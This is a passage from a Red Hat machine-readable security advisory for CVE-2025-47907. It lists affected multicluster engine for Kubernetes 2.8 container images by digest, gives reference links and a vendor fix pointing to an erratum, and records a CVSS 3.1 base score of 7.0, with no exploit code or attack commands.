"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-47907"
},
{
"category": "external",
"summary": "RHBZ#2387083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47907"
},
{
"category": "external",
"summary": "https://go.dev/cl/693735",
"url": "https://go.dev/cl/693735"
},
{
"category": "external",
"summary": "https://go.dev/issue/74831",
"url": "https://go.dev/issue/74831"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM",
"url": "https://groups.google.com/g/golang-announce/c/x5MKroML2yM"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-3849",
"url": "https://pkg.go.dev/vuln/GO-2025-3849"
}
],
"release_date": "2025-08-07T15:25:30.704000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
